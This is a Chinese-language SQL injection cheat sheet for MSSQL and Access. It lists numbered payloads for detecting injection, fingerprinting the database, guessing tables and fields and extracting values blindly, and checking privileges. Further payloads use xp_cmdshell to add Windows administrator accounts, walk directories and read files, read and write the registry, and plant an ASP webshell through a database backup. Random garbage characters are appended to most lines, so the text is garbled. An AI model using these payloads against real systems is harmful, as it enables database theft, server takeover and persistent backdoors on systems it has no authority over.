1.判断是否有注入;and 1=1 ;and 1=2 O/Y)&VG7
2.初步判断是否是mssql ;and user>0 _7)F
?
&<x@1,
3.注入参数是字符'and [查询条件] and ''=' qN|
fEO>
VHUW]8We
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 30cd|
S?
&XLD S=j
5.判断数据库系统 9uB(Mx(-:`
wsfd8T4
;and (select count(*) from sysobjects)>0 mssql \}]iS C.2
ra7uU*
;and (select count(*) from msysobjects)>0 access qv{o|g
QB
j6}R7$JR
ZU&"73
x%>
e)L<
6.猜数据库 ;and (select Count(*) from [数据库名])>0 90N`CXas
akuJz
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Wsj=!Obc
F@<0s&)1
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 $ChK]v
6C
}-<zWI{p
9.(1)猜字段的ascii值(access) qCMl!g'
f^<6`Aeq
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 vwGeD|Fb5
0lk;F
(2)猜字段的ascii值(mssql) L;t)c
CC >=UF
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 #VbVsl
!sSQQo2Sv
10.测试权限结构(mssql) N+W&NlZ
&Vk; VM`5
!^fa.I'mM
alFjc.~}
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- c@m5~
gQWd&)'muf
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- q 2?X"!
6vzk\n
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- V9 }t0$LN
|1=
!;.#
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- T5lQIr@a
'W. Vr4
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- v6a]1B
d.<~&.-$
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- k)(Biz398E
Y;J *4k]
;and 1=(select IS_MEMBER('db_owner'));-- ?:rx1}:F
h rN%
:Og:v#r8=
u62 )QJE
11.添加mssql和系统的帐户 -#&kYK#Ph
JN3cg
;exec master.dbo.sp_addlogin username;-- Lm)\Z P+W
;exec master.dbo.sp_password null,username,password;-- 7YIK9edP
D@YP7
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- p#8W#t$
{==pZpyyh
;exec master.dbo.xp_cmdshell 'net user username password =(r*
5vd
$6f\uuTU2"
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- B)SLG]72f
vFmJ;J
;exec master.dbo.xp_cmdshell 'net user username password /add';-- j0-McLc
{OMgd3%14
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- FcbM7/
%kI}
[6J_
/M0/-pV9
B\`Aojw"E?
12.(1)遍历目录 zzpZ19"`1
^+70<#Xc
;create table dirs(paths varchar(100), id int) EmVuwphv
2-If]Fc
;insert dirs exec master.dbo.xp_dirtree 'c:\' ]hw-Bu\{
'{?C{MK3Q
;and (select top 1 paths from dirs)>0 YhKZ|@
>R^@Ww;|q
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) MLVB^<qkeH
_uxPx 21g}
mPZGA\
3C>qh{z"
(2)遍历目录 6)RbPPeE
>O9sk
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- EYS>0Y
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ]L_w$ev'
Do-^S:.
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 {i{xo2<1"
#~ v4caNx
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 VAQ)Hc]
[.yJV`
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 3SG?W_
*U7%|wd
$+=
<(*
T8J4C=?/
13.mssql中的存储过程 pJpNO$$w
l)8&Ip
xp_regenumvalues 注册表根键, 子键 *b(wVvz
4n( E;!s
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 x4?10f(9=
,32xcj}j)r
xp_regread 根键,子键,键值名 U\<-mXv
T3J'fjY
;exec xp_regread pgc3jP!
U5ZX78>a
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 g$37;d3Tx
cA`4:gp
xp_regwrite 根键,子键, 值名, 值类型, 值 ~4 #B'Gy[
{+T/GBF-K=
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 :Hy]
=jAFgwP\
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 &V=7D# L
6DF
xp_regdeletevalue 根键,子键,值名 Nud,\mXrY[
L_O$>c
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 7_jE[10
!AHAS
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 6Z:YT&,f
Y>6.t"?Q^
B&KL2&Z~Pq
{ShgJ;! Q
14.mssql的backup创建webshell f4t.f*#
l[h'6+o
use model .-I|DVHe
pK_?}~
create table cmd(str image); TR vZ
cgZaPw2
bw
insert into cmd(str) values (''); 2!&pEqs
}7/e8 O2
backup database model to disk='c:\l.asp'; UGKaOol.
sa-9$},z4
6F0(aGs
v"6 \=@
15.mssql内置函数 $xW**&
|Fln8wB
;and (select @@version)>0 获得Windows的版本号 C".1+Um
fib#CY
;and user_name()='dbo' 判断当前系统的连接用户是不是sa S q@H
w<nv!e?
;and (select user_name())>0 爆当前系统的连接用户 rzLd"`
gSi5u#}J
;and (select db_name())>0 得到当前连接的数据库 XX; 6 P
Opg#*w%-
htJuGfDx1
4jwu'7Q
16.简洁的webshell dSK0h(8
6qp5Xt+
use model I44s(G1jl
wz(K*FP
create table cmd(str image); 'imU`zeo
p]|LV)R n
insert into cmd(str) values (''); JJk#,AP
`u'dh{,gE
backup database model to disk='g:\wwwtest\l.asp';